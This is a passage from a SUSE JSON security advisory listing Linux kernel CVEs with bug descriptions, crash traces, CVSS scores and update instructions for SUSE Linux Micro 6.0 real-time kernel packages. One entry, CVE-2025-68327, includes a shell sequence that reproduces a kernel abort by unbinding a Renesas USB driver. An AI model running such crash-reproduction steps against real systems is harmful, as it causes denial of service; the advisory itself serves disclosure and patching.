"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: stratix10-svc: fix bug in saving controller data\n\nFix the incorrect usage of platform_set_drvdata and dev_set_drvdata. They\nboth are of the same data and overrides each other. This resulted in the\nrmmod of the svc driver to fail and throw a kernel panic for kthread_stop\nand fifo free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68328",
"url": "https://www.suse.com/security/cve/CVE-2025-68328"
},
{
"category": "external",
"summary": "SUSE Bug 1255489 for CVE-2025-68328",
"url": "https://bugzilla.suse.com/1255489"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68328"
},
{
"cve": "CVE-2025-68330",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68330"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: accel: bmc150: Fix irq assumption regression\n\nThe code in bmc150-accel-core.c unconditionally calls\nbmc150_accel_set_interrupt() in the iio_buffer_setup_ops,\nsuch as on the runtime PM resume path giving a kernel\nsplat like this if the device has no interrupts:\n\nUnable to handle kernel NULL pointer dereference at virtual\n address 00000001 when read\n\nPC is at bmc150_accel_set_interrupt+0x98/0x194\nLR is at __pm_runtime_resume+0x5c/0x64\n(...)\nCall trace:\nbmc150_accel_set_interrupt from bmc150_accel_buffer_postenable+0x40/0x108\nbmc150_accel_buffer_postenable from __iio_update_buffers+0xbe0/0xcbc\n__iio_update_buffers from enable_store+0x84/0xc8\nenable_store from kernfs_fop_write_iter+0x154/0x1b4\n\nThis bug seems to have been in the driver since the beginning,\nbut it only manifests recently, I do not know why.\n\nStore the IRQ number in the state struct, as this is a common\npattern in other drivers, then use this to determine if we have\nIRQ support or not.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68330",
"url": "https://www.suse.com/security/cve/CVE-2025-68330"
},
{
"category": "external",
"summary": "SUSE Bug 1255493 for CVE-2025-68330",
"url": "https://bugzilla.suse.com/1255493"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68330"
},
{
"cve": "CVE-2025-68331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer\n\nWhen a UAS device is unplugged during data transfer, there is\na probability of a system panic occurring. The root cause is\nan access to an invalid memory address during URB callback handling.\nSpecifically, this happens when the dma_direct_unmap_sg() function\nis called within the usb_hcd_unmap_urb_for_dma() interface, but the\nsg-\u003edma_address field is 0 and the sg data structure has already been\nfreed.\n\nThe SCSI driver sends transfer commands by invoking uas_queuecommand_lck()\nin uas.c, using the uas_submit_urbs() function to submit requests to USB.\nWithin the uas_submit_urbs() implementation, three URBs (sense_urb,\ndata_urb, and cmd_urb) are sequentially submitted. Device removal may\noccur at any point during uas_submit_urbs execution, which may result\nin URB submission failure. However, some URBs might have been successfully\nsubmitted before the failure, and uas_submit_urbs will return the -ENODEV\nerror code in this case. The current error handling directly calls\nscsi_done(). In the SCSI driver, this eventually triggers scsi_complete()\nto invoke scsi_end_request() for releasing the sgtable. The successfully\nsubmitted URBs, when being unlinked to giveback, call\nusb_hcd_unmap_urb_for_dma() in hcd.c, leading to exceptions during sg\nunmapping operations since the sg data structure has already been freed.\n\nThis patch modifies the error condition check in the uas_submit_urbs()\nfunction. When a UAS device is removed but one or more URBs have already\nbeen successfully submitted to USB, it avoids immediately invoking\nscsi_done() and save the cmnd to devinfo-\u003ecmnd array. If the successfully\nsubmitted URBs is completed before devinfo-\u003eresetting being set, then\nthe scsi_done() function will be called within uas_try_complete() after\nall pending URB operations are finalized. Otherwise, the scsi_done()\nfunction will be called within uas_zap_pending(), which is executed after\nusb_kill_anchored_urbs().\n\nThe error handling only takes effect when uas_queuecommand_lck() calls\nuas_submit_urbs() and returns the error value -ENODEV . In this case,\nthe device is disconnected, and the flow proceeds to uas_disconnect(),\nwhere uas_zap_pending() is invoked to call uas_try_complete().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68331",
"url": "https://www.suse.com/security/cve/CVE-2025-68331"
},
{
"category": "external",
"summary": "SUSE Bug 1255495 for CVE-2025-68331",
"url": "https://bugzilla.suse.com/1255495"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68331"
},
{
"cve": "CVE-2025-68332",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68332"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: c6xdigio: Fix invalid PNP driver unregistration\n\nThe Comedi low-level driver \"c6xdigio\" seems to be for a parallel port\nconnected device. When the Comedi core calls the driver\u0027s Comedi\n\"attach\" handler `c6xdigio_attach()` to configure a Comedi to use this\ndriver, it tries to enable the parallel port PNP resources by\nregistering a PNP driver with `pnp_register_driver()`, but ignores the\nreturn value. (The `struct pnp_driver` it uses has only the `name` and\n`id_table` members filled in.) The driver\u0027s Comedi \"detach\" handler\n`c6xdigio_detach()` unconditionally unregisters the PNP driver with\n`pnp_unregister_driver()`.\n\nIt is possible for `c6xdigio_attach()` to return an error before it\ncalls `pnp_register_driver()` and it is possible for the call to\n`pnp_register_driver()` to return an error (that is ignored). In both\ncases, the driver should not be calling `pnp_unregister_driver()` as it\ndoes in `c6xdigio_detach()`. (Note that `c6xdigio_detach()` will be\ncalled by the Comedi core if `c6xdigio_attach()` returns an error, or if\nthe Comedi core decides to detach the Comedi device from the driver for\nsome other reason.)\n\nThe unconditional call to `pnp_unregister_driver()` without a previous\nsuccessful call to `pnp_register_driver()` will cause\n`driver_unregister()` to issue a warning \"Unexpected driver\nunregister!\". This was detected by Syzbot [1].\n\nAlso, the PNP driver registration and unregistration should be done at\nmodule init and exit time, respectively, not when attaching or detaching\nComedi devices to the driver. (There might be more than one Comedi\ndevice being attached to the driver, although that is unlikely.)\n\nChange the driver to do the PNP driver registration at module init time,\nand the unregistration at module exit time. Since `c6xdigio_detach()`\nnow only calls `comedi_legacy_detach()`, remove the function and change\nthe Comedi driver \"detach\" handler to `comedi_legacy_detach`.\n\n-------------------------------------------\n[1] Syzbot sample crash report:\nUnexpected driver unregister!\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister drivers/base/driver.c:273 [inline]\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nModules linked in:\nCPU: 0 UID: 0 PID: 5970 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nRIP: 0010:driver_unregister drivers/base/driver.c:273 [inline]\nRIP: 0010:driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nCode: 48 89 ef e8 c2 e6 82 fc 48 89 df e8 3a 93 ff ff 5b 5d e9 c3 6d d9 fb e8 be 6d d9 fb 90 48 c7 c7 e0 f8 1f 8c e8 51 a2 97 fb 90 \u003c0f\u003e 0b 90 90 5b 5d e9 a5 6d d9 fb e8 e0 f4 41 fc eb 94 e8 d9 f4 41\nRSP: 0018:ffffc9000373f9a0 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: ffffffff8ff24720 RCX: ffffffff817b6ee8\nRDX: ffff88807c932480 RSI: ffffffff817b6ef5 RDI: 0000000000000001\nRBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000001 R11: 0000000000000001 R12: ffffffff8ff24660\nR13: dffffc0000000000 R14: 0000000000000000 R15: ffff88814cca0000\nFS: 000055556dab1500(0000) GS:ffff8881249d9000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000055f77f285cd0 CR3: 000000007d871000 CR4: 00000000003526f0\nCall Trace:\n \u003cTASK\u003e\n comedi_device_detach_locked+0x12f/0xa50 drivers/comedi/drivers.c:207\n comedi_device_detach+0x67/0xb0 drivers/comedi/drivers.c:215\n comedi_device_attach+0x43d/0x900 drivers/comedi/drivers.c:1011\n do_devconfig_ioctl+0x1b1/0x710 drivers/comedi/comedi_fops.c:872\n comedi_unlocked_ioctl+0x165d/0x2f00 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_sys\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68332",
"url": "https://www.suse.com/security/cve/CVE-2025-68332"
},
{
"category": "external",
"summary": "SUSE Bug 1255483 for CVE-2025-68332",
"url": "https://bugzilla.suse.com/1255483"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68332"
},
{
"cve": "CVE-2025-68335",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68335"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel()\n\nSyzbot identified an issue [1] in pcl818_ai_cancel(), which stems from\nthe fact that in case of early device detach via pcl818_detach(),\nsubdevice dev-\u003eread_subdev may not have initialized its pointer to\n\u0026struct comedi_async as intended. Thus, any such dereferencing of\n\u0026s-\u003easync-\u003ecmd will lead to general protection fault and kernel crash.\n\nMitigate this problem by removing a call to pcl818_ai_cancel() from\npcl818_detach() altogether. This way, if the subdevice setups its\nsupport for async commands, everything async-related will be\nhandled via subdevice\u0027s own -\u003ecancel() function in\ncomedi_device_detach_locked() even before pcl818_detach(). If no\nsupport for asynchronous commands is provided, there is no need\nto cancel anything either.\n\n[1] Syzbot crash:\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]\nCPU: 1 UID: 0 PID: 6050 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nRIP: 0010:pcl818_ai_cancel+0x69/0x3f0 drivers/comedi/drivers/pcl818.c:762\n...\nCall Trace:\n \u003cTASK\u003e\n pcl818_detach+0x66/0xd0 drivers/comedi/drivers/pcl818.c:1115\n comedi_device_detach_locked+0x178/0x750 drivers/comedi/drivers.c:207\n do_devconfig_ioctl drivers/comedi/comedi_fops.c:848 [inline]\n comedi_unlocked_ioctl+0xcde/0x1020 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68335",
"url": "https://www.suse.com/security/cve/CVE-2025-68335"
},
{
"category": "external",
"summary": "SUSE Bug 1255480 for CVE-2025-68335",
"url": "https://bugzilla.suse.com/1255480"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68335"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
